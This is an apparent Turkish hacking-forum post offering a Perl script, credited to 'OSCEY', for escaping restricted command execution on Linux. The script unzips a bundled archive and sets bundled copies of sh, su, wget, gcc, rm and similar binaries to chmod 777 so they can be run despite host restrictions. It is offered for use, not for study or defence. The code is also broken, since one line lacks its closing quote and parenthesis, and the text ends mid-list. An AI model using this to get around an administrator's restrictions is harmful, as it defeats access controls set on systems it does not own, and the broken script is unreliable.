Web Güveliği

 Linuxta kısıtlı komutlardan kurtulma bypass method #1

chmod 777 ile çalıştırabilir komutu verdikten sonra ./id gibi dosyaları kullanabilirsiniz. Kolay gelsin 
Perl Sistem : 

Kod:

#!/usr/bin/perl
#Coded By OSCEY
#Command Bypass 
if(@ARGV < 1){ 
print q( 
Kullanim : perl oscey.pl -bypass


);exit;} 


if ($ARGV[0] =~ "-bypass" ) 
          {
system("unzip oscey.zip");
system("chmod 777 cat");
system("chmod 777 chmod");
system("chmod 777 datev
system("chmod 777 dir");
system("chmod 777 du");
system("chmod 777 gcc");
system("chmod 777 gunzip");
system("chmod 777 gzip");
system("chmod 777 id");
system("chmod 777 ln");
system("chmod 777 ls");
system("chmod 777 mkdir");
system("chmod 777 mv");
system("chmod 777 pwd");
system("chmod 777 rm");
system("chmod 777 sh");
system("chmod 777 su");
system("chmod 777 tail");
system("chmod 777 tar");
system("chmod 777 touch");
system("chmod 777 uname");
system("chmod 777 wget");
system("chmod 777 who");